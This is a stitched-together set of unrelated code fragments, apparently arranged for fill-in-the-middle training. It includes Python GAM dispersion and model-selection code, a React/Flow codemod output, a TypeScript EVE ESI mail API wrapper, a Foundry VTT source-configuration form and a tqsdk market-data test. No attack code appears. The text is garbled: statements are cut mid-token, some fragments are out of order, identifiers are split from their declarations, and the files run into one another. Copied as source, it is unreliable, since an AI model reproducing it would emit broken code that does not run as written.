return 2. * np.sum(y * np.log(y / mu) - (y - mu)) | return 2. * np.sum(-1. * np.log(y / mu) + (y - mu) / mu)
else:
return 2. * w.dot(-1. * np.log(y / mu) + (y - mu) / mu)
elif self._family == 'inverse_gaussian':
if w is None:
return np.sum( (y - mu) * (y - mu) / (mu * mu * y) )
else:
return w.dot( (y - mu) * (y - mu) / (mu * mu * y) )
def dispersion(self, formula='deviance'):
"""Dispersion
Returns the dispersion associated with the model. Depending on
the model family and whether the dispersion was specified by
the user, the dispersion may or may not be known a
priori. This function will estimate this parameter when
appropriate.
There are different ways of estimating this parameter that may
be appropriate for different kinds of families. The current
implementation is based on the deviance, as in Eqn 3.10 on
p. 110 of GAMr. As discussed in that section, this tends not
to work well for Poisson data (with overdispersion) when the
mean response is small. Alternatives are offered in that
section, but I have not yet implemented them. This is not
terribly relevant for the current implementation since
overdispersion is not supported! (When overdispersion is not
present, the dispersion of the Poisson is exactly 1.)
My eventual hope is to understand the appropriate methods for
all the different circumstances and have intelligent defaults
that can be overridden by opinionated users.
Parameters
----------
formula : str
Formula for the dispersion. Options include:
'deviance' (default)
'pearson'
'fletcher'
"""
if self._family == 'normal':
if self._known_dispersion:
return self._dispersion
else:
sigma2 = self.deviance() / (self._num_obs - self.dof())
return sigma2
elif self._family == 'binomial':
if self._known_dispersion:
return self._dispersion
elif self._estimate_overdispersion:
return self._binomial_overdispersion()
else:
return 1.
elif self._family == 'poisson':
return 1.
elif self._family == 'gamma':
if self._known_dispersion:
return self._dispersion
else:
return _gamma_dispersion(self.dof(), self.deviance(), self._num_obs)
# This equation is a first-order approximation valid when nu is
# large (see Section 8.3.6 of [GLM])
#Dbar = self.deviance() / self._num_obs
#return Dbar * (6. + Dbar) / (6. + 2. * Dbar)
elif self._family == 'inverse_gaussian':
if self._known_dispersion:
return self._dispersion
else:
sigma2 = self.deviance() / (self._num_obs - self.dof())
return sigma2
def _binomial_overdispersion(self, formula=None):
"""Over-Dispersion
Parameters
----------
formula : str
Which formula to use, either 'replication' or
'pearson'. See Notes.
Returns
-------
sigma2 : float
Estimate of over-dispersion. This is also saved as the
self._dispersion parameter so we only calculate this once
regardless of how many times this function is called.
Notes
-----
When using covariate classes, the observed variance may exceed
the baseline for the family due to clustering in the
population. See GLM for motivation. That text gives two
methodologies for estimating over-dispersion. When there are
no covariate classes (multiple observations with identical
features), estimating over-dispersion is not possible.
The most reliable assessment of over-dispersion is only
possible when there is replication amongst the covariate
classes. This is best illustrated through example. Suppose we
have data on patients from two hospitals as shown in the table
below. Note that there are 3 rows corresponding to Men in
hospital 1. These entries could of course be pooled to give
the total patients and survivors for this covariate class, but
because they have not, it permits us to estimate
over-dispersion more reliably.
Gender Hospital Patients Survivors
M 1 30 15
M 1 40 19
M 1 35 15
F 1 10 8
M 2 10 3
M 2 18 6
F 2 40 30
Because we are building a model based on gender and hospital
alone, we are assuming that all three entries are drawn from
the same binomial distribution. We could actually test that
hypothesis using, for example, Welch's t-Test. If the result
indicates a significant departure from the null hypothesis,
there must be some (unobserved) explanation for different
survival rates. Perhaps the repeated entries correspond to
different doctors, with some doctors being more effective than
others. Or perhaps the multiple entries refer to different
time periods, like before and after a new treatment was
instituted. Regardless, we can quantify the additional
variance and use it to make (hopefully) more accurate
confidence intervals.
When replication is present, we take the following approach,
per GLM. Suppose a particular covariate class (e.g. Gender=M,
Hospital=1) has r replicates. Across all r replicates,
determine the observed success rate, pi. In our example, we
have 105 patients and 49 survivors, for a total survival rate
of pi = 0.47. Next we compute the variance on r-1 DOF:
1 r (y_j - m_j * pi)^2
s^2 = --- \sum ------------------
r-1 j=1 m_j pi * (1 - pi)
where y_j is the number of successes in the jth replicate, m_j
is the number of trials in the jth replicate, and s^2 is
estimated variance. Per GLM, this is an unbiased estimate of
the dispersion parameter. Filling in our specific numbers, we
get s^2 = 0.17, indicating under-dispersion. (Important note:
these are made up numbers, so there is actually more
consistency in the data than would be exhibited from a true
binomial model. Over-dispersion is more common than
under-dispersion.)
Each covariate class with replication can be used to derive an
estimate of the dispersion parameter. If we expect the
dispersion to be independent of the covariate classes (which
may or may not be true), we can pool these estimates, weighted
by the degree of replication. If the kth covariate class has
r_k replicates and dispersion estimate s_k^2, the overall
estimate of dispersion is:
\sum_k (r_k - 1) * s_k^2
s^2 = -------------------------
\sum_k (r_k - 1)
Another important note: the above formula is *not* present in
GLM. That text just says to pool the estimates, but does not
specify how. This approach makes sense to me, but that doesn't
make it correct!
When replication is not present, or even if the degree of
replication is small, the above methodology breaks
down. Instead, GLM advocates the use of a Pearson-residual
based approach. If pi_j is the model prediction for the jth
covariate class, then we estimate dispersion as:
1 (y_j - m_j * pi_j)^2
s^2 = ----- \sum -----------------------
n - p j m_j * pi_j * (1 - pi_j)
This is similar to the replicate-based formula, but we are
using the model prediction for pi_j instead of the pooled
observations, and we are using the n-p as the error DOF
instead of the number of replicates. This methodology still
breaks down when the sizes of the covariate classes, m_j, are
small.
In order to use the replicate-based formula, there must be at
least one covariate class exhibiting replication, and the
degree of replication must be at least two. If these
conditions are not met, and the user dictates that we use the
replicate-based formula, we simply ignore that directive and
use the Pearson-based approach. (It might be best to issue a
warning in this case, but we do not do that.)
If this function is called without specifying which
methodology to use, we use the following criteria in assessing
whether there is enough replication to use the first
approach. First, there must be at least two covariate classes
exhibiting replication. Second, the degree of replication of
the most-replicated covariate class must be at least
3. Finally, the total replication degrees of freedom must be
at least 10. For example, in the example data set above, there
are two covariate classes exhibiting replication: Males in
Hospital 1, and Males in Hospital 2, with 3 and 2 degrees of
replication, respectively. The degree of replication of the
most-replicated covariate class is therefore equal to 3. The
degrees of freedom are (2-1) + (3-1) = 3, which is below the
threshold of 10. We would therefore use the Pearson-based
formula in this case.
These criteria are completely arbitrary! I need to do more
research to determine the appropriate criteria.
"""
if not self._has_covariate_classes:
return 1.
min_cc_replicates = 1
min_replication = 2
des_cc_replicates = 2
des_replication = 3
des_replication_dof = 10
# Determine degree of replication
#
# To use the replication formula, we need at least one
# covariate class with replication, and that covariate class
# needs replication of at least 2. It might make sense to use
# a more stringent set of criteria, but this is enough for
# now.
#
# The way we decide whether two observations have the same
# covariate class is by encoding the covariate class by an
# index. Each categorical feature has already indexed each
# category by an internal integer between 0 and n_k - 1, where
# n_k is the number of categories of the kth feature. (None of
# this is applicable unless all the features are categorical.
#
# We use these internal indices along with the numbers of
# categories in conjunction with the numpy ravel_multi_index
# function to map a tuple of category indices into a single
# integer between 0 and the the product of all category sizes
# (minus 1).
#
# We need to take care to loop over the features in a
# consistent order, so we create the fnames array just to give
# an arbitrary but consistent ordering.
r = {}
covariate_class = np.zeros((self._num_obs,))
fnames = self._features.keys()
for i in range(self._num_obs):
multi_index = []
dims = []
for fname in fnames:
cindex, csize = self._features[fname].category_index(i)
multi_index.append(cindex)
dims.append(csize)
cci = np.ravel_multi_index(multi_index, dims)
covariate_class[i] = cci
r[cci] = r.get(cci, 0) + 1
num_cc_with_replicates = 0
max_replication = 0
replication_dof = 0
for j in r.values():
if j > 1:
num_cc_with_replicates += 1
replication_dof += j - 1
if j > max_replication:
max_replication = j
if ((num_cc_with_replicates >= min_cc_replicates
and max_replication >= min_replication)):
has_replication = True
else:
has_replication = False
if ((num_cc_with_replicates >= des_cc_replicates
and max_replication >= des_replication
and replication_dof >= des_replication_dof)):
has_desired_replication = True
else:
has_desired_replication = False
if formula is None:
if has_desired_replication:
formula = 'replication'
else:
formula = 'pearson'
if has_replication and formula == 'replication':
trials = {}
successes = {}
# Initial loop to pool trials/successes.
for i in range(self._num_obs):
cci = covariate_class[i]
trials[cci] = trials.get(cci, 0) + self._covariate_class_sizes[i]
successes[cci] = successes.get(cci, 0) + self._y[i]
# Final loop to compute dispersion
s2 = 0.
for i in range(self._num_obs):
cci = covariate_class[i]
pi = float(successes[cci]) / trials[cci]
num = self._y[i] - self._covariate_class_sizes[i] * pi
denom = self._covariate_class_sizes[i] * pi * (1 - pi)
s2 += num * num / denom
# Divide by the error DOF
s2 /= replication_dof
self._known_dispersion = True
self._dispersion = s2
return s2
else:
mu = self._eval_inv_link(self._num_features * self.f_bar)
m = self._covariate_class_sizes
bl_var = np.multiply(mu, 1. - mu)
res = self._y - np.multiply(m, mu)
num = np.multiply(res, res)
denom = np.multiply(m, bl_var)
n_minus_p = self._num_obs - self.dof()
s2 = np.sum(np.divide(num, denom)) / n_minus_p
self._known_dispersion = True
self._dispersion = s2
return s2
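# Sanity check of the worked example in the docstring (Males in
# Hospital 1, pooled rate pi = 49. / 105 ~ 0.467):
# terms = [(15 - 30 * pi) ** 2 / (30 * pi * (1 - pi)),
# (19 - 40 * pi) ** 2 / (40 * pi * (1 - pi)),
# (15 - 35 * pi) ** 2 / (35 * pi * (1 - pi))]
# s2 = sum(terms) / (3 - 1) # ~ 0.17, matching the text above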
def dof(self):
"""Degrees of Freedom
Returns the degrees of freedom associated with this model.
Simply adds up the degrees of freedom associated with each
feature.
"""
dof = 1. # Affine factor
for name, feature in self._features.iteritems():
dof += feature.dof()
return dof
def aic(self):
"""Akaike Information Criterion
Returns the AIC for the fitted model, useful for choosing
smoothing parameters. The AIC we compute is actually off
by a constant factor, making it easier to compute without
detracting from its role in model selection.
Different authors seem to throw in multiplicative or additive
factors willy-nilly since it doesn't affect model selection.
"""
p = self.dof()
if not self._known_dispersion:
# If we are estimating the dispersion, we need to
# add one to the DOF.
p += 1
# Note that the deviance is twice the dispersion times the
# log-likelihood, so no factor of two required there.
return self.deviance() / self.dispersion() + 2. * p
# return (self.deviance() / self._num_obs
# + 2. * p * self.dispersion() / self._num_obs)
def aicc(self):
# Eqn 6.32 on p. 304 of [GAMr]
pass
def ubre(self, gamma=1.0):
"""Un-Biased Risk Estimator
Returns the Un-Biased Risk Estimator as discussed in Sections
6.2.1 and 6.2.5 of [GAMr]. This can be used for choosing the
smoothing parameter when the dispersion is known.
As discussed in Section 6.2.5 of [GAMr], sometimes it is helpful
to force smoother fits by exaggerating the effective degrees of
freedom. In that case, a value of gamma > 1. may be desirable.
"""
return self.deviance() + 2. * gamma * self.dispersion() * self.dof()
def gcv(self, gamma=1.0):
"""Generalized Cross Validation
This function returns the Generalized Cross Validation (GCV)
score, which can be used for choosing the smoothing parameter
when the dispersion is unknown.
As discussed in Section 6.2.5 of [GAMr], sometimes it is helpful
to force smoother fits by exaggerating the effective degrees of
freedom. In that case, a value of gamma > 1. may be desirable.
"""
denom = self._num_obs - gamma * self.dof()
return self._num_obs * self.deviance() / (denom * denom)
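# Illustrative smoothing selection (assumed usage; not from the original
# source): refit over a grid and keep the value minimizing GCV, or UBRE
# when the dispersion is known:
# for lam in [0.1, 1., 10.]:
# mdl.fit(X, y, smoothing=lam)
# print lam, mdl.gcv()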
def summary(self):
"""Print summary statistics associated with fitted model.
Prints statistics for the overall model, as well as for
each individual feature (see the __str__() function in
each feature type for details about what is printed
there).
For the overall model, the following are printed:
phi: Estimated dispersion parameter. Omitted
if specified or if it is known for the
Family (e.g. Poisson).
edof: Estimated degrees of freedom.
Deviance: The difference between the log-likelihood of
the model that fits the data perfectly and
that of the fitted model, times twice the
dispersion.
AIC: Akaike Information Criterion.
AICc: AIC with correction for finite data sets.
UBRE: Unbiased Risk Estimator (if dispersion is known).
GCV: Generalized Cross Validation (if dispersion is estimated).
For more details on these parameters, see the documentation
in the corresponding functions. It may also be helpful to
include an R^2 value where appropriate, and perhaps a p-value
for the model against the null model having just the affine
term. It would also be nice to have confidence intervals
at least on the estimated dispersion parameter.
"""
print 'Model Statistics'
print '----------------'
if not self._known_dispersion:
print 'phi: {0:0.06g}'.format(self.dispersion())
print 'edof: {0:0.0f}'.format(self.dof())
print 'Deviance: {0:0.06g}'.format(self.deviance())
print 'AIC: {0:0.06g}'.format(self.aic())
#print 'AICc: {0:0.06g}'.format(aicc)
if self._known_dispersion:
print 'UBRE: {0:0.06g}'.format(self.ubre())
else:
print 'GCV: {0:0.06g}'.format(self.gcv())
print ''
print 'Features'
print '--------'
for name, feature in self._features.iteritems():
print feature.__str__() | else:
return 2. * w.dot(y * np.log(y / mu) - (y - mu))
elif self._family == 'gamma':
if w is None: |
toast-change-color-prop.output.js | // @flow strict
import React from 'react';
import { Box, Toast, Toast as Renamed } from 'gestalt';
export default function | () {
return (
<Box>
<Toast text="Simple Toast" />
<Toast text="Simple Toast" color="red"/>
<Toast text="Simple Toast" />
<Toast text="Simple Toast" />
<Renamed text="Simple Toast" />
</Box>
);
}
| TestBox |
mail.ts | import {
PaginatedLoader, makeIDBasedLoader
} from '../../internal/page-loader';
import { SSOAgent } from '../../internal/esi-agent';
import { Responses, esi } from '../../../gen/esi';
/**
* An api adapter over the end points handling a specific message in a
* character's inbox via functions in the
* [mail](https://esi.evetech.net/latest/#/Mail) ESI endpoints.
*/
export interface Message {
/**
* @esi_example esi.characters(1, 'token').mail(2).info()
*
* @returns The full message content
*/
info(): Promise<Responses['get_characters_character_id_mail_mail_id']>;
/**
* @esi_example esi.characters(1, 'token').mail(2).del()
*
* @returns An empty promise that resolves after the message has been deleted
*/
del(): Promise<Responses['delete_characters_character_id_mail_mail_id']>;
/**
* @esi_example esi.characters(1, 'token').mail(2).update({...})
*
* @param state The new labels and read status for the message
* @return An empty promise that resolves after the message has been updated
*/
update(state: esi.character.mail.MailUpdate): Promise<Responses['put_characters_character_id_mail_mail_id']>;
/**
* @returns The message id
*/
id(): Promise<number>;
}
/**
* An api adapter over the end points handling a specific label in a
* character's inbox via functions in the
* [mail](https://esi.evetech.net/latest/#/Mail) ESI endpoints.
*/
export interface Label {
/**
* @esi_example esi.characters(1, 'token').mail.labels(2).del()
*
* @returns An empty promise that resolves after the label has been deleted
*/
del(): Promise<Responses['delete_characters_character_id_mail_labels_label_id']>;
/**
* @returns The label's id
*/
id(): Promise<number>;
}
/**
* An api adapter over the end points handling all labels in the character's
* inbox via functions in the [mail](https://esi.evetech.net/latest/#/Mail) ESI
* endpoints.
*/
export interface Labels {
/**
* Get a Label instance corresponding to the given label `id`.
* @param id The label id
* @returns A Label API wrapper
*/
(id: number): Label;
/**
* @esi_route get_characters_character_id_mail_labels [labels]
* @esi_example esi.characters(1, 'token').mail.labels()
*
* @returns Details for all of a character's mail labels
*/
(): Promise<esi.character.mail.Label[]>;
/**
* @esi_example esi.characters(1, 'token').mail.labels.add({...})
*
* @param settings The initial state of the new label
* @returns The new label's id
*/
add(settings: esi.character.mail.NewLabel): Promise<Responses['post_characters_character_id_mail_labels']>;
}
/**
* An api adapter over the end points handling the mail inbox for a character
* via functions in the [mail](https://esi.evetech.net/latest/#/Mail) ESI
* endpoints.
*/
export interface Mail {
/**
* @esi_example esi.characters(1, 'token').mail()
*
* @param labelIds If empty, no filtering is performed, otherwise the set
* of labels the returned message headers are restricted to
* @param lastMailId {Number} If not provided, the most recent mails are
* returned, otherwise only messages older than the given id are returned
* @returns List of message headers in the character's inbox
*/
(labelIds?: number[],
lastMailId?: number): Promise<Responses['get_characters_character_id_mail']>;
/**
* Get a Message instance for the given message or mail id.
*
* @param id The message id
* @returns An API wrapper providing access to the given message
*/
(id: number): Message;
/**
* A Labels instance for this character, allowing access to the labels they
* have created.
*/
labels: Labels;
/**
* This makes a request to the `labels` route and then filters the result
* to just return the total unread count.
*
* @esi_route get_characters_character_id_mail_labels [total_unread_count]
* @esi_returns total_unread_count
* @esi_example esi.characters(1, 'token').mail.unreadCount()
*
* @returns The total number of unread messages in a character's inbox
*/
unreadCount(): Promise<number>;
/**
* @esi_route post_characters_character_id_cspa
* @esi_example esi.characters(1, 'token').mail.cspaCost()
*
* @param toIds Array of entities to potentially send a mail to
* @returns The cspa cost for sending a message to the given entities
*/
cspaCost(toIds: number[]): Promise<number>;
/**
* Fetch all mails for the character as a single array. Use with caution as
* certain characters could have substantial amounts of mail.
*
* @returns All message headers in the character's inbox
*/
all(): Promise<Responses['get_characters_character_id_mail']>;
/**
* @esi_example esi.characters(1, 'token').mail.send({...})
*
* @param mail The mail specification
* @return The sent mail's id
*/
send(mail: esi.character.mail.NewMail): Promise<Responses['post_characters_character_id_mail']>;
/**
* @esi_example esi.characters(1, 'token').mail.lists()
*
* @returns List of details for a character's mailing list memberships
*/
lists(): Promise<Responses['get_characters_character_id_mail_lists']>;
}
/**
* Create a new {@link Mail} instance that uses the given character agent to
* make its HTTP requests to the ESI interface.
*
* @param char The character access information
* @returns An Mail API instance
*/
export function makeMail(char: SSOAgent): Mail {
let mail = <Mail> <any> function (messageIDorLabels?: number | number[],
lastMailId?: number) {
// Matching to the inbox function when the second argument exists (since
// 2nd function only takes 1 argument), or if the first argument is an
// array or undefined.
if (messageIDorLabels === undefined || Array.isArray(messageIDorLabels)
|| lastMailId !== undefined) {
return char.agent.request('get_characters_character_id_mail', {
path: { character_id: char.id },
query: { labels: <number[]|undefined> messageIDorLabels, last_mail_id: lastMailId }
}, char.ssoToken);
} else {
return new MessageImpl(char, messageIDorLabels);
}
};
let allMail: PaginatedLoader<esi.character.mail.MailHeader> = makeIDBasedLoader(
maxID => mail(undefined, maxID), item => item.mail_id!, 50);
mail.all = function () {
return allMail.getAll();
};
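  // Note (added commentary, not part of the original file): the loader
  // presumably walks the inbox page by page, re-requesting with the mail_id of
  // the oldest header seen so far and stopping once a page returns fewer than
  // 50 entries.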
mail.labels = makeLabels(char);
mail.unreadCount = function () {
return char.agent.request('get_characters_character_id_mail_labels',
{ path: { character_id: char.id } }, char.ssoToken)
.then(result => result.total_unread_count || 0);
};
mail.cspaCost = function (to: number[]) {
return char.agent.request('post_characters_character_id_cspa',
{ path: { character_id: char.id }, body: { characters: to } },
char.ssoToken).then(result => result.cost || 0);
};
mail.send = function (mail: esi.character.mail.NewMail) {
return char.agent.request('post_characters_character_id_mail',
{ path: { character_id: char.id }, body: mail }, char.ssoToken);
};
mail.lists = function () {
return char.agent.request('get_characters_character_id_mail_lists',
{ path: { character_id: char.id } }, char.ssoToken);
};
return mail;
}
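// Usage sketch (illustrative, not part of the original file):
//   const mail = makeMail(char);
//   mail().then(headers => { /* newest page of inbox headers */ });
//   mail([1, 2]).then(headers => { /* only headers with labels 1 or 2 */ });
//   mail(42).info().then(message => { /* full content of message 42 */ });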
class MessageImpl implements Message {
constructor(private char: SSOAgent, private id_: number) {
}
info() {
return this.char.agent.request('get_characters_character_id_mail_mail_id',
{ path: { character_id: this.char.id, mail_id: this.id_ } },
this.char.ssoToken);
}
del() {
return this.char.agent.request(
'delete_characters_character_id_mail_mail_id',
{ path: { character_id: this.char.id, mail_id: this.id_ } },
this.char.ssoToken);
}
update(state: esi.character.mail.MailUpdate) {
return this.char.agent.request('put_characters_character_id_mail_mail_id', {
path: { character_id: this.char.id, mail_id: this.id_ },
body: state
}, this.char.ssoToken);
}
id() {
return Promise.resolve(this.id_);
}
}
class LabelImpl implements Label {
constructor(private char: SSOAgent, private id_: number) {
}
del() {
return this.char.agent.request(
'delete_characters_character_id_mail_labels_label_id',
{ path: { character_id: this.char.id, label_id: this.id_ } },
this.char.ssoToken);
}
id() {
return Promise.resolve(this.id_);
}
}
function | (char: SSOAgent): Labels {
let labels = <Labels> <any> function (id?: number) {
if (id === undefined) {
return char.agent.request('get_characters_character_id_mail_labels',
{ path: { character_id: char.id } }, char.ssoToken)
.then(result => result.labels);
} else {
return new LabelImpl(char, id);
}
};
labels.add = function (settings: esi.character.mail.NewLabel) {
return char.agent.request('post_characters_character_id_mail_labels',
{ path: { character_id: char.id }, body: settings }, char.ssoToken);
};
return labels;
}
| makeLabels |
SourceConfigApplication.js | import DEFAULTS from '/modules/mmi/scripts/defaults.js';
import MMI, { validate, SourceFactory } from '/modules/mmi/scripts/main.js';
import DeckConfigApplication from '/modules/mmi/scripts/apps/DeckConfigApplication.js';
/**
* Form application to configure settings of the Deck.
*/
export default class | extends FormApplication {
constructor(object={}, options={}) {
super(object);
}
static get defaultOptions() {
return mergeObject(super.defaultOptions, {
title: 'Mildly Magical Inspiration - Source Configuration',
id: "source-config",
template: './' + DEFAULTS.templatePath + '/source-config.html',
width: 800,
height: "auto",
closeOnSubmit: false,
submitOnChange: false
})
}
getData(options) {
return mergeObject(super.getData().object, {
sources: MMI.sources
});
}
async activateListeners(html) {
super.activateListeners(html);
html.on('click', 'a.source-control', async (event) => {
const sourceId = $(event.target).parent().prop('id');
const actionType = $(event.target).parents('a.source-control').data('action') || $(event.target).data('action');
switch(actionType) {
case 'add':
this.addSource();
break;
case 'edit':
this.openSource(sourceId);
break;
case 'delete':
this.deleteSource(sourceId)
break;
}
});
this.markActive(html);
}
markActive(html) {
const activeSource = html.find('ul.source-list li.isActive label');
const newEl = $('<span></span>');
newEl.css('font-weight', 'bold');
newEl.css('font-style', 'italic');
        newEl.text(` (Currently Active)`);
activeSource.append(newEl);
}
addSource() {
MMI.makeDialog({
title: 'Add a new Source',
            content: `<p>To use a pre-existing source, upload a source file from your hard drive. The uploader only accepts JSON files!</p>`,
form: {
name: 'MMI-NewSourceUpload',
type: 'file',
options: { accept: '.json' }
},
buttons: {
fromFile: {
icon: 'fa-file-import',
label: 'Create Source from File',
callback: async () => { this.createFromFile($('input[name=MMI-NewSourceUpload]').prop('files')[0]) }
},
newSource: {
icon: 'fa-forward',
label: 'Skip Uploader',
callback: () => { this.createSource() }
}
},
def: 'newSource',
render: html => { MMI.disableOnEmpty({ target: html.find('button.fromFile'), operator: html.find('input[name="MMI-NewSourceUpload"]') }) }
})
}
async createFromFile(fileData) {
const fileName = fileData.name.split('.');
fileName.pop();
const fileContent = await readTextFromFile(fileData);
let valJSON;
if(validate.json(fileContent)) valJSON = JSON.parse(fileContent);
const validated = validate.source(valJSON);
if(validated) {
if(!validated.title) validated.title = fileName.join(' ');
this.createSource(validated);
}
}
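    // Note (added commentary, not in the original file): an uploaded file must
    // contain JSON that passes validate.source(); if the validated data lacks a
    // title, the file name (minus its extension) is used as the title, as
    // implemented above.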
async createSource(data = { title: 'New Source' }) {
const newSource = await SourceFactory.create(data);
this.openSource(newSource._id);
}
openSource(sourceId) {
new DeckConfigApplication({ sourceId }).render(true);
}
async deleteSource(sourceId) {
const source = MMI.getSource(sourceId);
MMI.makeDialog({
title: `Delete Source: ${ source.title }`,
content: `<p>Are you sure you want to delete the source <em>${ source.title }</em>?</p>`,
buttons: {
delete: {
icon: 'fa-check',
label: 'Delete Source',
callback: async () => {
await SourceFactory.removeSource(sourceId);
}
}
}
})
}
async _updateObject(event, formData) {
//
}
} | SourceConfigApplication |
test_md_basic.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import random
import unittest
from datetime import datetime
from tqsdk.test.api.helper import MockInsServer, MockServer
from tqsdk import TqApi, TqBacktest
class TestMdBasic(unittest.TestCase):
"""
    Tests the basic behaviour of the TqApi market-data functions, and that the
    interaction between TqApi and the market-data server matches the design.
    Notes:
    1. Before running these tests locally, set the environment variable
       PYTHONHASHSEED=32 so that the element order of dict/set data series in
       the api is identical on every run.
    2. If a test case calls a function that uses uuid (e.g. insert_order() uses
       uuid to generate order_id), then TqApi.RD = random.Random(x) must be set
       both when generating the script file and in the test case, so both runs
       produce identical uuids; x may range over 0-2^32.
    3. For live (non-backtest) test cases: because insert_date_time of a TqSim
       simulated Order and trade_date_time of a Trade are not fixed values,
       assert a range instead.
       Live: self.assertAlmostEqual(1575292560005832000 / 1e9, order1.insert_date_time / 1e9, places=1)
       Backtest: self.assertEqual(1575291600000000000, order1.insert_date_time)
"""
def setUp(self):
# self.ins = MockInsServer(5000)
self.mock = MockServer()
# self.tq = WebsocketServer(5300)
self.ins_url = "https://openmd.shinnytech.com/t/md/symbols/2019-07-03.json"
self.md_url = "ws://127.0.0.1:5100/"
self.td_url = "ws://127.0.0.1:5200/"
def tearDown(self):
# self.ins.close()
self.mock.close()
    # Market data retrieval tests
    # @unittest.skip("skip unconditionally")
def test_get_quote_normal(self):
"""
        Fetch a market quote.
"""
        # Preload the mocked server-side responses
dir_path = os.path.dirname(os.path.realpath(__file__))
self.mock.run(os.path.join(dir_path, "log_file", "test_md_basic_get_quote_normal.script.lzma"))
        # Fetch the quote
api = TqApi(_ins_url=self.ins_url, _td_url=self.td_url, _md_url=self.md_url)
q = api.get_quote("SHFE.cu1909")
self.assertEqual(q.datetime, "2019-09-16 14:59:59.999500")
self.assertEqual(q.ask_price1, 47650.0)
self.assertEqual(q.ask_volume1, 10)
self.assertEqual(q.bid_price1, 47570.0)
self.assertEqual(q.bid_volume1, 5)
self.assertEqual(q.last_price, 47580.0)
self.assertEqual(q.highest, 47860.0)
self.assertEqual(q.lowest, 47580.0)
self.assertEqual(q.open, 47860.0)
self.assertEqual(q.close, 47580.0)
self.assertEqual(q.average, 47732.35)
self.assertEqual(q.volume, 9020)
self.assertEqual(q.amount, 2152729000.0)
self.assertEqual(q.open_interest, 6940)
self.assertEqual(q.settlement, 47730.0)
self.assertEqual(q.upper_limit, 49650.0)
self.assertEqual(q.lower_limit, 44920)
self.assertEqual(q.pre_open_interest, 13260)
self.assertEqual(q.pre_settlement, 47290.0)
self.assertEqual(q.pre_close, 47590.0)
self.assertEqual(q.price_tick, 10)
self.assertEqual(q.price_decs, 0)
self.assertEqual(q.volume_multiple, 5)
self.assertEqual(q.max_limit_order_volume, 500)
self.assertEqual(q.max_market_order_volume, 0)
self.assertEqual(q.min_limit_order_volume, 0)
self.assertEqual(q.min_market_order_volume, 0)
self.assertEqual(q.underlying_symbol, "")
        self.assertTrue(q.strike_price != q.strike_price)  # check for nan (nan != nan)
self.assertEqual(q.expired, False)
self.assertEqual(q.ins_class, "FUTURE")
self.assertEqual(q.margin, 16233.000000000002)
self.assertEqual(q.commission, 11.594999999999999)
self.assertEqual(repr(q.trading_time.day),
"[['09:00:00', '10:15:00'], ['10:30:00', '11:30:00'], ['13:30:00', '15:00:00']]")
self.assertEqual(repr(q.trading_time.night), "[['21:00:00', '25:00:00']]")
self.assertEqual(q.expire_datetime, 1568617200.0)
self.assertEqual(q.delivery_month, 9)
self.assertEqual(q.delivery_year, 2019)
self.assertEqual(q.instrument_id, "SHFE.cu1909")
self.assertEqual(q.ask_price2, 47730.0)
self.assertEqual(q.ask_volume2, 10)
self.assertEqual(q.ask_price3, 47990.0)
self.assertEqual(q.ask_volume3, 5)
self.assertEqual(q.ask_price4, 49250.0)
self.assertEqual(q.ask_volume4, 50)
        self.assertEqual(q.ask_price5 != q.ask_price5, True)  # check for nan
self.assertEqual(q.ask_volume5, 0)
self.assertEqual(q.bid_price2, 46560.0)
self.assertEqual(q.bid_volume2, 100)
self.assertEqual(q.bid_price3, 45650.0)
self.assertEqual(q.bid_volume3, 270)
self.assertEqual(q.bid_price4, 44920.0)
self.assertEqual(q.bid_volume4, 5)
self.assertEqual(q.bid_price5 != q.bid_price5, True)
self.assertEqual(q.bid_volume5, 0)
        # alternative ways to access values
self.assertEqual(q["pre_close"], 47590.0)
self.assertEqual(q.get("pre_settlement"), 47290.0)
self.assertEqual(q.get("highest"), 47860.0)
self.assertEqual(q.get("lowest"), 47580.0)
self.assertEqual(q["open"], 47860.0)
self.assertEqual(q["close"], 47580.0)
        # error cases
self.assertRaises(Exception, api.get_quote, "SHFE.au1999")
self.assertRaises(KeyError, q.__getitem__, "ask_price6")
api.close()
def test_get_kline_serial(self):
"""
        Fetch kline (candlestick) data.
"""
        # Preload the mocked server-side responses
dir_path = os.path.dirname(os.path.realpath(__file__))
self.mock.run(os.path.join(dir_path, "log_file", "test_md_basic_get_kline_serial.script.lzma"))
        # Test: fetch kline data
TqApi.RD = random.Random(1)
api = TqApi(_ins_url=self.ins_url, _td_url=self.td_url, _md_url=self.md_url)
klines = api.get_kline_serial("SHFE.cu1909", 10)
self.assertEqual(klines.iloc[-1].close, 47580.0)
self.assertEqual(klines.iloc[-1].id, 660788)
self.assertEqual(klines.iloc[-2].id, 660787)
self.assertEqual(klines.iloc[-1].datetime, 1.56861719e+18)
self.assertEqual(klines.iloc[-1].open, 47580)
self.assertEqual(klines.iloc[-1].volume, 0.0)
self.assertEqual(klines.iloc[-1].open_oi, 6940.0)
self.assertEqual(klines.iloc[-1].duration, 10)
        # alternative ways to access values
self.assertEqual(klines.duration.iloc[-1], 10)
self.assertEqual(klines.iloc[-1]["duration"], 10)
self.assertEqual(klines["duration"].iloc[-1], 10)
        # error cases
self.assertRaises(Exception, api.get_kline_serial, "SHFE.au1999", 10)
self.assertRaises(AttributeError, klines.iloc[-1].__getattribute__, "dur")
self.assertRaises(KeyError, klines.iloc[-1].__getitem__, "dur")
api.close()
def test_get_tick_serial(self):
"""
        Fetch tick data.
"""
        # Preload the mocked server-side responses
dir_path = os.path.dirname(os.path.realpath(__file__))
self.mock.run(os.path.join(dir_path, "log_file", "test_md_basic_get_tick_serial.script.lzma"))
        # Test: fetch tick data
TqApi.RD = random.Random(2)
api = TqApi(_ins_url=self.ins_url, _td_url=self.td_url, _md_url=self.md_url)
ticks = api.get_tick_serial("SHFE.cu1909")
self.assertEqual(ticks.iloc[-1].id, 2822951.0)
| l(ticks.iloc[-1].datetime, 1.5686171999995e+18)
self.assertEqual(ticks.iloc[-1].last_price, 47580)
self.assertEqual(ticks.iloc[-1].average, 47732.3516)
self.assertEqual(ticks.iloc[-1].highest, 47860)
self.assertEqual(ticks.iloc[-1].lowest, 47580)
self.assertEqual(ticks.iloc[-1].ask_price1, 47650)
self.assertEqual(ticks.iloc[-1].ask_volume1, 10)
self.assertEqual(ticks.iloc[-1].bid_price1, 47570)
self.assertEqual(ticks.iloc[-1].bid_volume1, 5)
self.assertEqual(ticks.iloc[-1].volume, 9020)
self.assertEqual(ticks.iloc[-1].amount, 2152729000.0)
self.assertEqual(ticks.iloc[-1].open_interest, 6940)
self.assertEqual(ticks.iloc[-1].duration, 0)
        # alternative ways to access values
